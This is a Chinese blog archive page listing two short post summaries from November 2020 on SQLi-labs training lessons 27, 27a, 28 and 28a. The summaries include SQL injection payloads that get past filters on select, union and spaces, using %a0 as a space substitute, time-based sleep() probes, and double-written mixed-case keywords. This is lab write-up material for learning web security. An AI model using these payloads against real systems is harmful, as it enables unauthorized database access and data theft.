2020 年 11月 4 日随笔档案 - 峰中追风

2020年11月4日

摘要： 28与27差别不大，28分隔符为(' ') ?id=100%27)union%a0select%a01,2,1=(%271# 28a与28分隔符一致 ?id=-1%27)union%a0select%a01,@@version,1=(%271 阅读全文

posted @ 2020-11-04 08:06 峰中追风阅读(88) 评论(0) 推荐(0) 编辑

Less27、27a【select、union、空格过滤】

摘要： 27对select、union、空格过滤 1、用时间注入进行测试 ?id=123%27or%a0if((database()=%27security%27),sleep(0.3),sleep(0.1))and%a01=%271# 2、利用双写+大小写混合绕过 ?id=22221%27%a0ununi 阅读全文

posted @ 2020-11-04 08:05 峰中追风阅读(87) 评论(0) 推荐(0) 编辑

阿俄菲格Tempt